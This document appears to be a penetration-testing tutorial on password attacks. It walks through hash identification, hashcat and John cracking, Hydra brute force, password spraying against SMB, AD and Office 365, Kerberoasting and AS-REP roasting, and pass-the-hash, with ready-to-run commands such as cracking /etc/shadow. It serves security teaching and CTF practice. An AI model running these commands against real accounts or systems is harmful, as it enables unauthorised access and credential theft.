TL;DR
- Identify the hash type before cracking — hashcat's
-mmode must match the algorithm or you will never crack anything - Hashcat is GPU-accelerated — orders of magnitude faster than CPU-based tools; hardware quality directly determines crack speed
- Dictionary attacks with rules (best64, dive) outperform brute force for real-world passwords that have been "humanised"
- Password spraying sends one password to many accounts — check lockout policy first or you will lock out every account you target
- NTLM hashes do not require cracking — use them directly in Pass-the-Hash attacks against Windows systems
Overview
Password attacks span the full lifecycle — from capturing hashes off the wire to cracking them offline, from brute-forcing login forms to spraying a single password across thousands of accounts. Understanding which technique applies when is as important as the tooling itself.
Prerequisites
- Basic understanding of authentication: what hashing and salting do, the difference between NTLM and Kerberos
- Comfortable with the Linux terminal — hashcat and John run from the command line
- An active engagement or CTF context — you need captured hashes or a live target to spray against
Recommended lab: HackTheBox machines with credential-harvesting opportunities (Forest, Active, Resolute for AD environments). TryHackMe "John The Ripper" room. Download practice hash sets from hashes.org.
Hash Identification
Before cracking, identify the hash type. The format determines the attack mode and speed.
bash
# Identify hash type
hashid '$2y$10$somehashedvalue'
hash-identifier
# Common hash examples
# MD5: 32 hex chars 5f4dcc3b5aa765d61d8327deb882cf99
# SHA1: 40 hex chars 5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8
# NTLM: 32 hex chars 8846f7eaee8fb117ad06bdd830b7586c
# bcrypt: $2y$ or $2b$ prefix
# sha512crypt: $6$ prefix (Linux /etc/shadow)Offline Hash Cracking
Hashcat
Hashcat is GPU-accelerated — orders of magnitude faster than CPU cracking.
bash
# Dictionary attack
hashcat -m 1000 hashes.txt /usr/share/wordlists/rockyou.txt
# Dictionary + rules (best results for real-world passwords)
hashcat -m 1000 hashes.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule
# Brute-force mask (8 chars, upper+lower+digits)
hashcat -m 1000 hashes.txt -a 3 ?u?l?l?l?d?d?d?d
# Common hash modes
# -m 0 MD5
# -m 100 SHA1
# -m 1000 NTLM
# -m 1800 sha512crypt (Linux shadow)
# -m 3200 bcrypt
# -m 13100 Kerberos TGS (AS-REP / TGS-REP)
# -m 22000 WPA2 (handshake)
# Resume a session
hashcat --session mysession --restoreJohn the Ripper
Better for format auto-detection and certain hash types.
bash
# Auto-detect and crack
john hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt
# Crack Linux shadow file
unshadow /etc/passwd /etc/shadow > combined.txt
john combined.txt --wordlist=/usr/share/wordlists/rockyou.txt
# Show cracked passwords
john hashes.txt --show
# Crack zip/office/ssh key passwords
zip2john secret.zip > zip.hash && john zip.hash
ssh2john id_rsa > ssh.hash && john ssh.hash --wordlist=/usr/share/wordlists/rockyou.txtNetwork Authentication Attacks
Hydra — Online Brute Force
bash
# SSH brute force
hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://10.10.10.5
# HTTP POST login form
hydra -l admin -P passwords.txt 10.10.10.5 http-post-form "/login:username=^USER^&password=^PASS^:Invalid credentials"
# Multiple usernames from file
hydra -L users.txt -P passwords.txt ftp://10.10.10.5
# SMB
hydra -l Administrator -P passwords.txt smb://10.10.10.5Password Spraying
Spraying sends one password to many accounts — avoids lockouts triggered by per-account thresholds.
bash
# SMB spraying with CrackMapExec
crackmapexec smb 10.10.10.0/24 -u users.txt -p 'Winter2024!' --continue-on-success
# Active Directory spraying
kerbrute passwordspray -d domain.local --dc 10.10.10.5 users.txt 'Password123'
# Office 365 / Azure AD spray
./MSOLSpray.py --userlist users.txt --password 'Spring2024!'Kerberos Attacks
AS-REP Roasting
Targets accounts with "Do not require Kerberos pre-authentication" enabled.
bash
# Get AS-REP hashes without credentials
GetNPUsers.py domain.local/ -usersfile users.txt -no-pass -dc-ip 10.10.10.5 -format hashcat -outputfile asrep.txt
# Crack with hashcat mode 18200
hashcat -m 18200 asrep.txt /usr/share/wordlists/rockyou.txtKerberoasting
Targets service accounts with SPNs — requires any domain user account.
bash
# Request TGS tickets for all SPNs
GetUserSPNs.py domain.local/user:password -dc-ip 10.10.10.5 -request -outputfile tgs.txt
# Crack with hashcat mode 13100
hashcat -m 13100 tgs.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.ruleWordlist Strategy
The wordlist is often the limiting factor, not the tool.
bash
# Generate custom wordlist from target website
cewl http://target.com -d 3 -m 5 -w custom_wordlist.txt
# Add mutations with john rules
john --wordlist=custom_wordlist.txt --rules --stdout > mutated.txt
# Combine multiple lists
cat /usr/share/wordlists/rockyou.txt custom_wordlist.txt | sort -u > combined.txt
# Top wordlists on Kali
ls /usr/share/wordlists/
# rockyou.txt — 14M passwords, classic
# /usr/share/seclists/Passwords/ — curated collectionsOperational Notes
- Never spray without knowing the lockout policy — 3 wrong attempts on a 30-minute lockout destroys the engagement.
- NTLM hashes don't need cracking — use pass-the-hash directly against SMB/WinRM.
- GPU vs CPU — bcrypt on CPU is 100 H/s; on GPU it's 20,000 H/s. Hardware matters.
- Check hashcat potfile — previously cracked hashes are stored and skip automatically.
What to Read Next
- Post-Exploitation — cracked credentials enable lateral movement and privilege escalation across the network
- Reconnaissance — cracked passwords reveal naming conventions useful for targeted spraying
- Exploitation — Kerberos attacks (Kerberoasting, AS-REP Roasting) often precede full domain compromise